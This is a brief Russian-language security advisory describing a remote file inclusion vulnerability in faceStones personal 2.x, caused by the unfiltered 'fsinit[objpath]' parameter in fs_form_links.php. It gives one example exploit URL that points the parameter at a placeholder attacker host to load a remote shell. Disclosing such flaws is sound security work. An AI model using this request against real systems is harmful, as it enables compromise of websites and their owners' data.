Программа: faceStones personal 2.x

Обнаруженная уязвимость может быть использована злоумышленником для компрометации уязвимой системы. Уязвимость существует из-за того, что данные, передаваемые через параметр "fsinit[objpath]» не правильно обрабатываются в fsl2/objects/fs_form_links.php.

Пример:

http://sitename.com/[Script Path]/fsl2/objects/fs_form_links.php? GLOBALS[fsinit][objpath]=http://SHELLURL.COM



Оставить мнение